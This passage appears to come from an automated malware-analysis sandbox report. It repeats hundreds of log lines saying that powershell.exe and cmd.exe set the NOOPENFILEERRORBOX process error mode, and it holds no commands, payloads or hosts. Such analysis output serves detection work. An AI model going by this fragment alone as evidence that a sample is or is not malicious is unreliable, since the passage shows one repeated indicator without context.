              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
